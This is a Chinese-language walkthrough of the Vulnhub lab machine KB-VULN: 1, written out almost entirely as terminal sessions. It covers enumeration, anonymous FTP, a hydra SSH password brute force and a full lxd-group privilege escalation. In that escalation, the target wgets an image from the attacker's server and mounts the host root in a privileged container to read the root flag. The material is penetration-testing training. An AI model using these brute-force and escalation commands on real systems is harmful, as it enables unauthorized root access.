KB-Vuln
作者:jason_huawen
靶机基本信息
名称:KB-VULN: 1
地址:
https://www.vulnhub.com/entry/kb-vuln-1,540/
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.71.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:93:01:25 1 60 PCS Systemtechnik GmbH
192.168.56.221 08:00:27:09:6b:fc 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带netdiscover工具识别目标主机IP地址为192.168.56.221
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.221 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 22:22 EST
Nmap scan report for localhost (192.168.56.221)
Host is up (0.000083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA)
| 256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA)
|_ 256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: OneSchool — Website by Colorlib
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:09:6B:FC (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)、80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ ftp 192.168.56.221
Connected to 192.168.56.221.
220 (vsFTPd 3.0.3)
Name (192.168.56.221:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||42883|)
150 Here comes the directory listing.
drwxrwxr-x 2 1000 1000 4096 Aug 22 2020 .
drwxrwxr-x 2 1000 1000 4096 Aug 22 2020 ..
-rw-r--r-- 1 0 0 54 Aug 22 2020 .bash_history
226 Directory send OK.
ftp> get .bash_history
local: .bash_history remote: .bash_history
229 Entering Extended Passive Mode (|||39219|)
150 Opening BINARY mode data connection for .bash_history (54 bytes).
100% |********************************************************************************| 54 31.05 KiB/s 00:00 ETA
226 Transfer complete.
54 bytes received in 00:00 (25.21 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ cat .bash_history
exit
ls
cd /etc/update-motd.d/
ls
nano 00-header
exit
目前还不清楚这些信息有什么作用?接下来来看一下80端口:
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ gobuster dir -u http://192.168.56.121 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.121
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/25 22:30:00 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.121/: Get "http://192.168.56.121/": dial tcp 192.168.56.121:80: connect: no route to host
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ gobuster dir -u http://192.168.56.221 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.221
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/25 22:31:00 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.221/images/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.221/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.221/js/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.221/fonts/]
/server-status (Status: 403) [Size: 279]
Progress: 217424 / 220561 (98.58%)===============================================================
2022/11/25 22:31:14 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ gobuster dir -u http://192.168.56.221 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.221
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,sh,html
[+] Timeout: 10s
===============================================================
2022/11/25 22:31:58 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.221/images/]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 25578]
/css (Status: 301) [Size: 314] [--> http://192.168.56.221/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.221/js/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.221/fonts/]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1099779 / 1102805 (99.73%)===============================================================
2022/11/25 22:33:14 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ dirb http://192.168.56.221
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Nov 25 22:33:21 2022
URL_BASE: http://192.168.56.221/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.221/ ----
==> DIRECTORY: http://192.168.56.221/css/
==> DIRECTORY: http://192.168.56.221/fonts/
==> DIRECTORY: http://192.168.56.221/images/
+ http://192.168.56.221/index.html (CODE:200|SIZE:25578)
==> DIRECTORY: http://192.168.56.221/js/
+ http://192.168.56.221/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.221/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.221/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.221/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.221/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Nov 25 22:33:22 2022
DOWNLOADED: 4612 - FOUND: 2
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ searchsploit colorlib
Exploits: No Results
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ nikto -h http://192.168.56.221
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.221
+ Target Hostname: 192.168.56.221
+ Target Port: 80
+ Start Time: 2022-11-25 22:34:20 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 63ea, size: 5ad7b006c93b4, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2022-11-25 22:34:35 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
没有扫描出有价值的目录或者文件。但是需要认真的查看页面源代码,在源代码有注释:
</div>
<!-- Username : sysadmin -->
</div>
也就是说用户名为:sysadmin
那就用hydra工具破解一下ssh密码:
┌──(kali㉿kali)-[~]
└─$ hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.221
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-25 22:57:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.221:22/
[22][ssh] host: 192.168.56.221 login: sysadmin password: password1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-25 22:57:18
┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '192.168.56.221 (192.168.56.221)' can't be established.
ED25519 key fingerprint is SHA256:YqYTXGkivCGOSSwfW5lnCGt62N2WC6Z9Rdn+sjpl2YU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.221' (ED25519) to the list of known hosts.
[email protected]'s password:
WELCOME TO THE KB-SERVER
Last login: Sat Aug 22 18:00:48 2020
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
sysadmin@kb-server:~$ id
uid=1000(sysadmin) gid=1000(sysadmin) groups=1000(sysadmin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
sysadmin@kb-server:~$
提权
sysadmin@kb-server:~$ cat user.txt
48a365b4ce1e322a55ae9017f3daf0c0
由于sysadmin率属于lxd组,因此可以利用lxd进行提权:
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 3.39 MiB/s, done.
Resolving deltas: 100% (15/15), done.
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ ls
jason.sh lxd-alpine-builder nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ cd lxd-alpine-builder
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln/lxd-alpine-builder]
└─$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz build-alpine LICENSE README.md
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln/lxd-alpine-builder]
└─$ cp alpine-v3.13-x86_64-20210218_0139.tar.gz ..
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln/lxd-alpine-builder]
└─$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz build-alpine LICENSE README.md
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln]
└─$ python -m http.server 80
将alpine下载到目标主机的/tmp目录
sysadmin@kb-server:/tmp$ wget http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-11-26 04:20:53-- http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’
alpine-v3.13-x86_64-20210218_01 100%[=====================================================>] 3.11M --.-KB/s in 0.02s
2022-11-26 04:20:53 (181 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]
sysadmin@kb-server:/tmp$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz
jason.sh
systemd-private-c8f9a2165cd74162a84c9dae844347b2-apache2.service-8Q49iR
systemd-private-c8f9a2165cd74162a84c9dae844347b2-systemd-resolved.service-4W9DXG
systemd-private-c8f9a2165cd74162a84c9dae844347b2-systemd-timesyncd.service-jpwRHH
tmux-1000
sysadmin@kb-server:/tmp$
导入alpine image
sysadmin@kb-server:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias jasonimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
sysadmin@kb-server:/tmp$ lxc image list
+------------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+------------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| jasonimage | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Nov 26, 2022 at 4:22am (UTC) |
+------------+--------------+--------+-------------------------------+--------+--------+------------------------------+
sysadmin@kb-server:/tmp$
运行命令,发现报错
sysadmin@kb-server:/tmp$ lxc init jasonimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
此时需要lxd init初始化,一路回车
sysadmin@kb-server:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
再次运行初始化jasonimage,就没有报错:
sysadmin@kb-server:/tmp$ lxc init jasonimage ignite -c security.privileged=true
Creating ignite
sysadmin@kb-server:/tmp$ lxc init jasonimage ignite -c security.privileged=true
Creating ignite
sysadmin@kb-server:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
sysadmin@kb-server:/tmp$ lxc start ignite
sysadmin@kb-server:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls -alh
total 2G
drwxr-xr-x 24 root root 4.0K Aug 22 2020 .
drwxr-xr-x 1 root root 8 Nov 26 04:26 ..
drwxr-xr-x 2 root root 4.0K Aug 6 2020 bin
drwxr-xr-x 4 root root 4.0K Aug 22 2020 boot
drwxr-xr-x 2 root root 4.0K Aug 22 2020 cdrom
drwxr-xr-x 19 root root 3.8K Nov 26 03:17 dev
drwxr-xr-x 92 root root 4.0K Aug 22 2020 etc
drwxr-xr-x 3 root root 4.0K Aug 22 2020 home
lrwxrwxrwx 1 root root 34 Aug 22 2020 initrd.img -> boot/initrd.img-4.15.0-112-generic
lrwxrwxrwx 1 root root 34 Aug 22 2020 initrd.img.old -> boot/initrd.img-4.15.0-112-generic
drwxr-xr-x 22 root root 4.0K Aug 22 2020 lib
drwxr-xr-x 2 root root 4.0K Aug 6 2020 lib64
drwx------ 2 root root 16.0K Aug 22 2020 lost+found
drwxr-xr-x 2 root root 4.0K Aug 6 2020 media
drwxr-xr-x 2 root root 4.0K Aug 6 2020 mnt
drwxr-xr-x 2 root root 4.0K Aug 6 2020 opt
dr-xr-xr-x 149 root root 0 Nov 26 03:17 proc
drwx------ 4 root root 4.0K Aug 22 2020 root
drwxr-xr-x 28 root root 940 Nov 26 04:25 run
drwxr-xr-x 2 root root 4.0K Aug 22 2020 sbin
drwxr-xr-x 2 root root 4.0K Aug 22 2020 snap
drwxr-xr-x 3 root root 4.0K Aug 22 2020 srv
-rw------- 1 root root 1.9G Aug 22 2020 swap.img
dr-xr-xr-x 13 root root 0 Nov 26 04:04 sys
drwxrwxrwt 11 root root 4.0K Nov 26 04:20 tmp
drwxr-xr-x 10 root root 4.0K Aug 6 2020 usr
drwxr-xr-x 14 root root 4.0K Aug 22 2020 var
lrwxrwxrwx 1 root root 31 Aug 22 2020 vmlinuz -> boot/vmlinuz-4.15.0-112-generic
lrwxrwxrwx 1 root root 31 Aug 22 2020 vmlinuz.old -> boot/vmlinuz-4.15.0-112-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 32K
drwx------ 4 root root 4.0K Aug 22 2020 .
drwxr-xr-x 24 root root 4.0K Aug 22 2020 ..
-rw------- 1 root root 1.5K Aug 22 2020 .bash_history
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 22 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Aug 22 2020 .ssh
-rw-r--r-- 1 root root 33 Aug 22 2020 flag.txt
/mnt/root/root # cat flag.txt
1eedddf9fff436e6648b5e51cb0d2ec7
/mnt/root/root #
成功得到了root flag.
经验教训
- 需要仔细查看页面源代码,否则有些时候就进入了死胡同